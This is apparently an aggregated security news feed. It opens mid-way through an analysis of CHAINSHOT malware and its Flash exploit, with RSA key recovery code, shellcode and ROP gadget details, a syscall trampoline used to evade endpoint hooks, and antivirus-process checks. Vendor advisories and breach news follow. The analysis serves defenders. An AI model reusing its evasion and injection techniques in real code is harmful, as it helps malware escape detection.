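    return rsa_unwrap_key(enc_key, private_exponent(p, q, e), p * q), iv, ciphertext


def demo(seed=1):
    """Round trip: downloader key pair -> server wraps AES key -> analyst unwraps it from p, q."""
    rng = random.Random(seed)
    p, q = gen_prime(256, rng), gen_prime(256, rng)
    n = p * q
    blob = build_blob(rsa_wrap_key(AES_KEY, n, E, rng), IV, b"constructed ciphertext")
    key, iv, _ = recover_aes_key(blob, p, q)
    return key == AES_KEY and iv == IV
```

The one-liner `pow(e, -1, phi)` is the whole private key: once n is factored there is no further secret to recover, which is why a 512-bit modulus offered the attacker no protection against an analyst with a PCAP and a few hours of EC2 time.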

Server-side Reproduction

After we had the decrypted Flash exploit and shellcode payloads, we started with static analysis, which turned out to be quite a tedious task. This is due to the obfuscation in the exploit and the complexity of the shellcode payload, which contains its own two PE payloads. Next, we attempted dynamic analysis, which quickly turned out to be impossible, because every stage relies on data passed from the previous one. The shellcode payload does not execute properly without the data passed to it from the exploit, the exploit does not execute on its own without the variables passed from the downloader, and so on.

Due to the difficulties of analyzing the code statically, we decided to reproduce a simplified version of the server-side PHP scripts in order to make a full dynamic analysis possible. As we had the decrypted exploit, shellcode payload and the PCAP, we had all the information required to do so. Specifically, we created the following setup:

  • Local Apache server with XAMPP, with the domain used in the attack configured to resolve to localhost
  • A directory structure which mirrored that on the attackers’ servers (as specified in the PCAPs)
  • Setting of custom HTTP headers as per the PCAPs’ responses.

All of the requested files are sent back gzip encoded, otherwise the attack chain doesn’t work. We have uploaded the PHP scripts to our GitHub account, so you can also play with the different stages and see how it works.

Additional Details of the Flash Exploit

While the exploit has already been described, we want to give some additional details surrounding it that we found during our analysis. In particular, we were interested in the part which transfers execution to the shellcode payload. While most parts of the decompiled ActionScript exploit code are obfuscated, luckily some method names were left in cleartext.

Because the decrypted shellcode payload doesn’t run on its own when transformed into an executable, we have to figure out how execution works and if one or more parameters are passed. Therefore, the most interesting method for us is “executeShellcodeWithCfg32” which indicates we can find the passed data in it. It creates a small shellcode template and fills some placeholder values at runtime. The disassembled template looks as follows:


Figure 3. Shellcode template with placeholders (red) in the Flash exploit to pass execution to the shellcode payload

While the final prepared shellcode looks as follows:


Figure 4. Runtime version of the shellcode template with filled placeholders

Let’s take a look at what values are set to the placeholders (0x11111111, 0x22222222, …). The address 0xA543000 in Figure 4 is the entrypoint of the decrypted shellcode payload which has a small NOP sled in front of the actual code:


Figure 5. Entrypoint of the shellcode template in memory

The address 0x771A1239 in Figure 4 is in the middle of the function NtPrivilegedServiceAuditAlarm in ntdll.dll:


Figure 6. Windows API function NtPrivilegedServiceAuditAlarm

However, we can also see in Figure 4 that before calling the API function via “call edx”, the value 0x4D is moved into eax, which is the system call ID of the API function NtProtectVirtualMemory. By doing so, NtProtectVirtualMemory is executed without calling it directly. This trick is likely used to bypass AVs/sandboxes/anti-exploit software which hook NtProtectVirtualMemory, and the attacker probably chose NtPrivilegedServiceAuditAlarm as a trampoline because it’s unlikely to ever be monitored.

The data at address 0x9DD200C in Figure 4 looks like a structure into which the last NTSTATUS return value of NtProtectVirtualMemory is copied. The address of this structure seems to be passed to the shellcode payload in ebx; however, we haven’t figured out what its purpose is. Finally, the shellcode payload is executed via “call edi”.

To sum up, the memory access rights of the shellcode payload are changed in 0x1000 byte blocks to RWE via NtProtectVirtualMemory. The last NTSTATUS code is saved into memory pointed to by ebx and the shellcode payload is executed.

Another interesting aspect of the exploit code is that it sends status messages when something goes wrong at every stage of the exploitation. These status messages are very similar to those sent by the initial Flash downloader and are sent to the attacker’s server via fake PNG files (see Icebrg). They also contain the “/stab/” directory in the URL, and the actual message is again encoded via custom digit combinations. However, the status messages of the exploitation code contain additional information in the form of abbreviations of the corresponding stage. By looking at those messages, we can get a better understanding of how the exploit works. The following messages are possible:

Status message code    Description
2-0-9-vp               Short for VirtualProtect
2-0-9-g3               Short for something like gadget3 (ROP gadget), because a byte array 0x5A5941584159C3 is created, which disassembles to: pop edx; pop ecx; inc ecx; pop eax; inc ecx; pop ecx
2-0-9-RtlAllocateHeap  Self-explanatory
2-0-9-DeleteDC         Self-explanatory
2-0-9-GetDC            Self-explanatory
2-0-9-sprintf          Self-explanatory
2-0-9-VP               Short for VirtualProtect
2-0-9-RU               Short for RtlUnwind
2-0-9-NVP              Short for NtProtectVirtualMemory
2-0-9-NPSAA            Short for NtPrivilegedServiceAuditAlarm
2-0-9-G                Probably short for Gadget
2-0-9-SRP              Short for something like StackReturnProcedure, because two byte arrays 0x81C4D8000000C3 and 0x81C4D0000000C3 are created, which disassemble to: add esp, 0D8h – and – add esp, 0D0h
2-0-9-PAX              Short for something like PopEAX, as a byte array 0x58C3 is created before it, which disassembles to: pop eax

Table 1. Status messages used in the Flash exploit code
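To cross-check the gadget labels in Table 1, here is an added Python decoder (not part of the original analysis) that covers only the handful of opcodes those byte arrays use; the byte strings are the ones quoted in the table, and note that the trailing 0xC3 each array ends with is a ret, which the table's listings leave out.

```python
"""Decode the short x86 byte arrays from Table 1 into mnemonics.

Added example, not from the original analysis.  Supports only the opcodes
those arrays contain (pop/inc r32, add r32, imm32, nop, ret); any other
byte is emitted as a raw 'db' so nothing is silently misread.
"""

REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Byte arrays exactly as quoted in Table 1 (hex written big-endian there).
TABLE1_ARRAYS = {
    "2-0-9-g3":  bytes.fromhex("5A5941584159C3"),
    "2-0-9-SRP": [bytes.fromhex("81C4D8000000C3"),
                  bytes.fromhex("81C4D0000000C3")],
    "2-0-9-PAX": bytes.fromhex("58C3"),
}
GADGET3 = TABLE1_ARRAYS["2-0-9-g3"]
SRP_D8, SRP_D0 = TABLE1_ARRAYS["2-0-9-SRP"]
PAX = TABLE1_ARRAYS["2-0-9-PAX"]


def disassemble(code):
    """Return a list of mnemonic strings for the supported x86 subset."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        if 0x58 <= op <= 0x5F:                 # 58+r : pop r32
            out.append(f"pop {REGS32[op - 0x58]}")
            i += 1
        elif 0x40 <= op <= 0x47:               # 40+r : inc r32
            out.append(f"inc {REGS32[op - 0x40]}")
            i += 1
        elif op == 0xC3:                       # C3 : ret
            out.append("ret")
            i += 1
        elif op == 0x90:                       # 90 : nop
            out.append("nop")
            i += 1
        elif (op == 0x81 and i + 5 < len(code)
              and code[i + 1] >> 6 == 3          # ModRM mod=11 (register)
              and (code[i + 1] >> 3) & 7 == 0):  # /0 selects ADD
            reg = REGS32[code[i + 1] & 7]
            imm = int.from_bytes(code[i + 2:i + 6], "little")
            out.append(f"add {reg}, 0x{imm:X}")
            i += 6
        else:                                  # unknown: show the raw byte
            out.append(f"db 0x{op:02X}")
            i += 1
    return out


def is_ret_terminated(code):
    """True if the sequence ends in ret, i.e. it can be chained as a gadget."""
    return disassemble(code)[-1] == "ret"


def table1_disassembly():
    """Map each Table 1 status code to the disassembly of its byte array(s)."""
    result = {}
    for code, arrays in TABLE1_ARRAYS.items():
        arrays = arrays if isinstance(arrays, list) else [arrays]
        result[code] = [disassemble(a) for a in arrays]
    return result


if __name__ == "__main__":
    for code, listings in table1_disassembly().items():
        for listing in listings:
            print(f"{code:10s} {'; '.join(listing)}")
```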

The Shellcode Payload

After the exploit successfully gains RWE permissions, execution is passed to the shellcode payload. The shellcode loads an embedded DLL internally named FirstStageDropper.dll, which we call CHAINSHOT, into memory and runs it by calling its export function “__xjwz97”. The DLL contains two resources: the first is an x64 DLL internally named SecondStageDropper.dll and the second is an x64 kernelmode shellcode.

FirstStageDropper.dll is responsible for injecting SecondStageDropper.dll into another process to execute it. While the shellcode payload only contains code to search for and bypass EMET, FirstStageDropper.dll also contains code for Kaspersky and Bitdefender. In the case of EMET, it searches the loaded modules for emet.dll and emet64.dll; for Kaspersky it searches for klsihk.dll; and for Bitdefender it searches for avcuf32.dll and avcuf64.dll. It also collects user, system and process information, encrypts it and sends it together with a unique hardcoded ID to the attacker’s server. The data is sent to URLs that contain “/home/” and “/log/” directories, and for encryption it uses the Rijndael algorithm. As the attacker’s server did not respond at the time of our analysis, we assume a command is sent back to execute SecondStageDropper.dll.

While the samples we obtained inject SecondStageDropper.dll in usermode via thread injection, the x64 shellcode seems to have an option to inject it from kernelmode. However, we haven’t figured out what the exact purpose of it is, since it’s never executed; it also searches for an additional resource which wasn’t present in the samples we analyzed.

The kernelmode shellcode contains parts of Blackbone, an open source library for Windows memory hacking. The following functions are taken from its code:

  • FindOrMapModule
  • BBQueueUserApc
  • BBCallRoutine
  • BBExecuteInNewThread

It also contains code from TitanHide, using identical code to look up the SSDT on Win7 and Win10 as described by its author.

SecondStageDropper.dll acts as a downloader for the final payload. It collects various information from the victim system, encrypts it, and sends it to the attacker’s server. It also scans for the following processes and skips execution if found:

Process name      Security Solution
mbam.exe          Malwarebytes
seccecenter.exe   Symantec / Norton (contains a typo, should be seccenter.exe)
avp.exe           Kaspersky
HitmanPro.exe     Sophos / HitmanPro
abcde.exe         ?

Table 2. Process name lookup list

Unfortunately, at the time of the analysis we were unable to obtain additional files, so we were unable to figure out what the final stage is. However, CHAINSHOT contacts the following domains via HTTPS to get the final payload:

  • contact.planturidea[.]net
  • dl.nmcyclingexperience[.]com
  • tools.conductorstech[.]com

In both samples we analyzed, the final domains used were the same. We obtained two x86 versions of the shellcode payload with its embedded PE files and the kernelmode shellcode. While the shellcode payload, FirstStageDropper.dll and kernel shellcode do not differ, SecondStageDropper.dll contains a couple of different strings. The following strings differ, possibly indicating they are changed for every victim, with the final payload directory being an MD5 representation of the “project name” or something similar.

User-agent
  Sample 1: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0
  Sample 2: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:10.0) Gecko/20100101 Firefox/10.0
Queried final payload directories
  Sample 1: /0cd173cf1caa2aa03a52b80d7521cc75e
Unique string used in network communication
  Sample 1: 148a028d-57c6-4094-b07d-720df09246dd
  Sample 2: 3784113f-b04e-4c1e-b3be-6b0a22464921

Table 3. String differences in SecondStageDropper.dll

The shellcode payload and PE files partly contain the same code, indicating a framework was used to create them. For example, both the shellcode and CHAINSHOT itself make extensive use of the same exception handling with custom error codes. They also both use the same code to scan for and bypass EMET. Furthermore, other parts such as the OS version recognition are identical in all samples, and the PE files’ compilation timestamps are zeroed out. Another interesting fact is that FirstStageDropper.dll also sends status messages back to the attacker, starting with the digit “9”. For example, the following network capture from our local tests shows successful network communication up to the point where the attacker presumably sends back the command to execute SecondStageDropper.dll:


Figure 7. Network capture of a successful attack reproduced locally in a VM

Additional Infrastructure

One of the domains reported by IceBrg had an associated SSL certificate which was documented in their write-up. By searching for other IP addresses using the same certificate we were able to find a large number of associated domains that were likely also used in similar attack campaigns. Just like the domain contacted by the Excel documents we analyzed, the additional domain names are created in a similar way, use similar hosting providers and registrars, and have names very similar to official websites to avoid suspicion. The list of domains can be found in the IOC section.


We uncovered part of a new toolkit which was used as a downloader alongside the Adobe Flash exploit CVE-2018-5002 to target victims in the Middle East. This was possible because the attacker made a mistake in using insecure 512-bit RSA encryption. The malware sends encrypted user information to the attacker’s server and attempts to download a final-stage implant. It appears to have been developed with the help of an unknown framework and makes extensive use of custom error handling. Because the attacker made another mistake in reusing the same SSL certificate for similar attacks, we were able to uncover additional infrastructure indicating a larger campaign.

Palo Alto Networks customers are protected from this threat in the following ways:

  • WildFire detects all malicious Excel documents, the Flash downloader and exploit and all CHAINSHOT samples with malicious verdicts
  • AutoFocus customers can track the samples with the CVE-2018-5002 exploit and CHAINSHOT malware tags
  • Traps detects and blocks the malicious Excel documents with the Flash exploit

Finally, we’d like to thank Tom Lancaster for his assistance in this investigation.

Indicators of Compromise

Adobe Flash Downloader

Adobe Flash Exploit (CVE-2018-5002)

X86 Shellcode Payloads:
The post Slicing and Dicing CVE-2018-5002 Payloads: New CHAINSHOT Malware appeared first on Palo Alto Networks Blog.

Author: Dominik Reichel

Cisco Issues Security Patch Updates for 32 Flaws in its Products

Cisco today released thirty security advisories to address a total of 32 security vulnerabilities in its products, three of which are rated critical, including the recently disclosed Apache Struts remote code execution vulnerability that is being exploited in the wild.

Of the remaining 29 vulnerabilities, fourteen are rated high and 15 medium in severity, addressing security flaws in Cisco Routers, Cisco Webex, Cisco Umbrella, Cisco SD-WAN Solution, Cisco Cloud Services Platform, Cisco Data Center Network, and more products.

The three critical security vulnerabilities patched by Cisco address issues in Apache Struts, the Cisco Umbrella API, and the management interface of the Cisco RV110W, RV130W and RV215W routers.

Apache Struts Remote Code Execution Vulnerability (CVE-2018-11776)

The vulnerability, reported late last month by Semmle security researcher Man Yue Mo, resides in the core of Apache Struts and originates from insufficient validation of user-provided untrusted input in the core of the Struts framework under certain configurations.


“The vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results with no namespace value and the use of url tags with no value or action,” Cisco explains in its advisory.

“In cases where upper actions or configurations also have no namespace or a wildcard namespace, an attacker could exploit this vulnerability by sending a request that submits malicious input to the affected application for processing.”

An unauthenticated, remote attacker can trigger the vulnerability by tricking victims to visit a specially crafted URL on the affected web server, allowing the attacker to execute malicious code and eventually take complete control over the targeted server running the vulnerable application.

All applications that use Apache Struts—supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions—are potentially vulnerable to this flaw, even when no additional plugins have been enabled.

Apache Struts patched the vulnerability with the release of Struts versions 2.3.35 and 2.5.17 last month. Now, Cisco has also released fixes to address the issue in several of its products. You can check the list of vulnerable Cisco products here.

Since there are no workarounds for this issue, organizations and developers are strongly advised to update their Struts components as soon as possible.

Cisco Umbrella API Unauthorized Access Vulnerability (CVE-2018-0435)

The second critical vulnerability patched by Cisco resides in the Cisco Umbrella API that could allow an authenticated, remote attacker to view and modify data across their organization as well as other organizations.

Cisco Umbrella is a cloud security platform that provides the first line of defense against threats over all ports and protocols by blocking access to malicious domains, URLs, IPs, and files before a connection is ever established or a file is downloaded.

The vulnerability is due to insufficient authentication configuration for the API interface of Cisco Umbrella, and successful exploitation could allow an attacker to read or modify data across multiple organizations.

Cisco has addressed this vulnerability in the Cisco Umbrella production APIs. No user action is required.

Cisco Routers Management Interface Buffer Overflow Vulnerability (CVE-2018-0423)

The last, but not least, critical vulnerability resides in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router and could allow an unauthenticated, remote attacker to execute arbitrary code or cause a DoS condition.

The flaw occurs due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface.

To exploit this vulnerability, an attacker can send malicious requests to a targeted device, triggering a buffer overflow condition.

“A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code,” the company explains.

This vulnerability affects all releases of Cisco RV110W Wireless-N VPN Firewall, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router.

Cisco has addressed this vulnerability in a firmware release for the Cisco RV130W Wireless-N Multifunction VPN Router, and will not release firmware updates for the Cisco RV110W Wireless-N VPN Firewall and Cisco RV215W Wireless-N VPN Router.

According to the company’s Product Security Incident Response Team (PSIRT), Apache Struts is being exploited in the wild, while the team is not aware of any exploits leveraging the other two critical flaws.


Air Canada Suffers Data Breach — 20,000 Mobile App Users Affected

Air Canada has confirmed a data breach that may have affected about 20,000 customers of its 1.7 million mobile app users.

The company said it had “detected unusual log-in behavior” on its mobile app between August 22 and 24, during which the personal information for some of its customers “may potentially have been improperly accessed.”

The exposed information includes basic details such as customers’ names, email addresses, phone numbers, and other information they have added to their profiles.

Passport Numbers Exposed in Air Canada Data Breach

What’s more worrisome:

Hackers could also have accessed additional data including the customer’s passport number, passport expiration date, passport country of issuance and country of residence, Aeroplan number, known traveler number, NEXUS number, gender, date of birth, and nationality, if users had this information saved in their profile on the Air Canada mobile app.

The airline assured its customers that credit card information saved to their profile was “encrypted and stored in compliance with security standards set by the payment card industry or PCI standards,” and is therefore protected.

However, Air Canada still recommends that affected customers monitor their credit card transactions and contact their financial services provider immediately if they find any unusual or unauthorized activity.

Reset Your Password

The company estimates about 1% of its 1.7 million people—or about 20,000 users in total—who use its mobile app may have been affected by the security breach.

Although it is currently not clear how the data breach occurred, whether it was a direct breach of Air Canada’s systems or was due to the reuse of passwords from other sites, the airline encourages users to reset their passwords following improved password guidelines, which say passwords should be at least 10 characters long and contain one symbol.

However, as a precaution, the airline has locked down all 1.7 million accounts until all of its customers—even those whose information was not exposed in the breach—change their passwords.

Air Canada has contacted potentially affected customers directly by email, starting August 29, to tell them that their account may have been improperly accessed by hackers.


CIA Network Exposed Through Insecure Communications System

Interesting story of a CIA intelligence network in China that was exposed partly because of a computer-security failure:

Although they used some of the same coding, the interim system and the main covert communication platform used in China at this time were supposed to be clearly separated. In theory, if the interim system were discovered or turned over to Chinese intelligence, people using the main system would still be protected — and there would be no way to trace the communication back to the CIA. But the CIA’s interim system contained a technical error: It connected back architecturally to the CIA’s main covert communications platform. When the compromise was suspected, the FBI and NSA both ran “penetration tests” to determine the security of the interim system. They found that cyber experts with access to the interim system could also access the broader covert communications system the agency was using to interact with its vetted sources, according to the former officials.

In the words of one of the former officials, the CIA had “fucked up the firewall” between the two systems.

U.S. intelligence officers were also able to identify digital links between the covert communications system and the U.S. government itself, according to one former official — links the Chinese agencies almost certainly found as well. These digital links would have made it relatively easy for China to deduce that the covert communications system was being used by the CIA. In fact, some of these links pointed back to parts of the CIA’s own website, according to the former official.

People died because of that mistake.

The moral — which is to go back to pre-computer systems in these high-risk sophisticated-adversary circumstances — is the right one, I think.

Author: Bruce Schneier

Hacker Discloses Unpatched Windows Zero-Day Vulnerability (With PoC)

A security researcher has publicly disclosed the details of a previously unknown zero-day vulnerability in Microsoft’s Windows operating system that could help a local user or malicious program obtain SYSTEM privileges on the targeted machine.

And guess what? The zero-day flaw has been confirmed working on a “fully-patched 64-bit Windows 10 system.”

The vulnerability is a privilege escalation issue which resides in the Windows Task Scheduler and occurred due to errors in the handling of Advanced Local Procedure Call (ALPC) systems.

Advanced Local Procedure Call (ALPC) is an internal mechanism, available only to Windows operating system components, that facilitates high-speed and secure data transfer between one or more processes in user mode.

The revelation of the Windows zero-day came earlier today from a Twitter user with online alias SandboxEscaper, who also posted a link to a Github page hosting a proof-of-concept (PoC) exploit for the privilege escalation vulnerability in Windows.

“Here is the alpc bug as 0day: I don’t fucking care about life anymore. Neither do I ever again want to submit to MSFT anyway. Fuck all of this shit,” SandboxEscaper tweeted (archive), which has now been deleted.


Zero-Day Works Well on Fully-Patched 64-Bit Windows 10 PC

Shortly after that, CERT/CC vulnerability analyst Will Dormann verified the authenticity of the zero-day bug, and tweeted:

“I’ve confirmed that this works well in a fully-patched 64-bit Windows 10 system. LPE right to SYSTEM!”

According to a short online advisory published by CERT/CC, the zero-day flaw, if exploited, could allow local users to obtain elevated (SYSTEM) privileges.

Since the Advanced Local Procedure Call (ALPC) interface is local to the system, the impact of the vulnerability is limited, with a CVSS score of 6.4 to 6.8, but the PoC exploit released by the researcher could potentially help malware authors target Windows users.

SandboxEscaper did not notify Microsoft of the zero-day vulnerability, leaving all Windows users exposed until a security patch is released by the tech giant to address the issue.

Microsoft is likely to patch the vulnerability in its next month’s security Patch Tuesday, which is scheduled for September 11.

The CERT/CC notes it is currently unaware of any practical solution to this zero-day bug.


Threat Brief: Information on Critical Apache Struts Vulnerability CVE-2018-11776

Situation Overview

On August 22, 2018, the Apache Foundation released a critical security update for CVE-2018-11776, a remote code execution vulnerability affecting Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16. The Apache Foundation has urged everyone to apply the security updates as soon as possible.

This post provides information to help organizations assess their risk from the vulnerability and to inform Palo Alto Networks customers of protections in place that can help mitigate their risk until they can apply the security updates. Palo Alto Networks customers who have deployed the latest vulnerability signatures released on August 24, 2018, are protected.

Vulnerability Information

According to both the Apache Foundation and security researcher Man Yue Mo, this vulnerability can enable remote code execution on a server running a vulnerable version of Apache Struts. The method of attack would be through a specially crafted URL sent to the vulnerable system. In most cases, this means no authentication is required to exploit the vulnerability.

A successful attack would run code in the security context that Struts is using. In some cases, this could effectively lead to a total compromise of the system.

It’s important to note, however, that the vulnerability is not exploitable in default configurations. The following two conditions must both be met for a system to be vulnerable to attack:

  1. The alwaysSelectFullNamespace flag is set to “true” in the Struts configuration. (Note: If your application uses the popular Struts Convention plugin, this is set to “true” by default by the plugin.)
  2. The Struts application uses “actions” that are configured without specifying a namespace, or with a wildcard namespace. This condition applies to actions and namespaces specified in the Struts configuration file. NOTE: If your application uses the popular Struts Convention plugin, this condition also applies to actions and namespaces specified in Java code.

If your Struts application does not meet both of these conditions, your application may still be vulnerable but not (currently) exploitable via CVE-2018-11776.
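As an added example (not from the advisory or Palo Alto Networks), the following Python script checks a struts.xml for both conditions at once. It assumes the flag is set through the struts.xml constant struts.mapper.alwaysSelectFullNamespace; the two sample configurations are constructed, and because the Convention plugin's default cannot be seen in the XML, the caller passes that in.

```python
"""Flag Struts 2 configurations that meet both CVE-2018-11776 conditions.

Added example, not the advisory's or Palo Alto Networks' code.  Assumes the
flag is configured via the struts.xml constant
struts.mapper.alwaysSelectFullNamespace.  Both XML documents are constructed
samples.
"""
import xml.etree.ElementTree as ET

FULL_NS_CONSTANT = "struts.mapper.alwaysSelectFullNamespace"

# Constructed sample: flag enabled and a package with no namespace at all.
VULNERABLE_XML = """
<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="index" class="com.example.IndexAction"/>
  </package>
  <package name="admin" namespace="/admin" extends="struts-default">
    <action name="dashboard" class="com.example.DashboardAction"/>
  </package>
</struts>
"""

# Constructed sample: same actions, every package has a concrete namespace,
# and the flag is left at its (false) default.
HARDENED_XML = """
<struts>
  <package name="default" namespace="/" extends="struts-default">
    <action name="index" class="com.example.IndexAction"/>
  </package>
  <package name="admin" namespace="/admin" extends="struts-default">
    <action name="dashboard" class="com.example.DashboardAction"/>
  </package>
</struts>
"""


def always_select_full_namespace(root):
    """Condition 1: the constant is explicitly set to true in struts.xml."""
    for const in root.iter("constant"):
        if const.get("name") == FULL_NS_CONSTANT:
            return const.get("value", "").strip().lower() == "true"
    return False


def unnamespaced_actions(root):
    """Condition 2: actions in a package whose namespace attribute is
    missing, empty, or a wildcard pattern (contains '*')."""
    hits = []
    for pkg in root.iter("package"):
        ns = pkg.get("namespace")
        if ns is None or ns.strip() == "" or "*" in ns:
            for action in pkg.iter("action"):
                hits.append((pkg.get("name"), action.get("name"), ns))
    return hits


def assess(xml_text, uses_convention_plugin=False):
    """Return (exploitable, findings).  uses_convention_plugin=True models
    the plugin's default of alwaysSelectFullNamespace=true, which the XML
    alone does not reveal."""
    root = ET.fromstring(xml_text)
    cond1 = always_select_full_namespace(root) or uses_convention_plugin
    hits = unnamespaced_actions(root)
    findings = []
    if cond1:
        findings.append("alwaysSelectFullNamespace is effectively true")
    for pkg, action, ns in hits:
        findings.append(f"package {pkg!r}: action {action!r} has namespace {ns!r}")
    # Both conditions must hold for the known PoC to apply.
    return cond1 and bool(hits), findings


if __name__ == "__main__":
    for label, doc in (("vulnerable sample", VULNERABLE_XML),
                       ("hardened sample", HARDENED_XML)):
        exploitable, findings = assess(doc)
        print(f"{label}: exploitable={exploitable}")
        for finding in findings:
            print("  -", finding)
```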

In particular, if your application uses the popular Struts Convention plugin, it appears to potentially increase your risk of exploitability vis-à-vis other Struts implementations that do not use that plugin.

Threat Environment Information

The vulnerability was disclosed on August 22 in conjunction with security updates that address it. Detailed information about the vulnerability and how to exploit it is currently available, and proof-of-concept (PoC) code is available as well. As noted above, the PoC works only against systems that are vulnerable and meet both conditions for exploitability.

Some have noted that a previous critical Struts vulnerability was actively attacked last year only three days after the release of the security update and vulnerability information.

There are no known active attacks at this time, and the current requirement that two non-default conditions be met for the vulnerability to be exploitable makes for a different threat environment.

However, with a PoC available, we can expect at minimum probing, if not active exploitation, of this vulnerability in the near term.

Until they can patch, organizations should focus their risk assessments for possible attack on four things:

  1. Are they using the Struts Convention plugin?
  2. Do they meet both of the required conditions for exploitation?
  3. Is there any weaponization of, or indication of attacks using, the current PoC?
  4. Are there new PoCs or attacks that render moot the two conditions required for exploitability?

Guidance and Protections for Palo Alto Networks Customers

All organizations running vulnerable versions of Apache Struts should deploy the security updates as soon as possible.

Organizations can and should prioritize scheduling and deployment of the security updates based on their security policy and risk assessment, and on currently available information.

Palo Alto Networks customers who have deployed the vulnerability signatures released on August 24, 2018, which include signature ID 33948 (Apache Struts 2 Remote Code Execution Vulnerability), are protected against currently known exploits for that vulnerability.

Our customers should still deploy the security update as recommended above, but can and should deploy the latest vulnerability signature immediately for additional protection. With this additional protection available, our customers can and should include it in their decisions around scheduling and deployment of the security updates and in their risk assessment of the vulnerability and threat environment.

As always, we are monitoring the situation closely and will provide additional details as they become available.

The post Threat Brief: Information on Critical Apache Struts Vulnerability CVE-2018-11776 appeared first on Palo Alto Networks Blog.

Author: Christopher Budd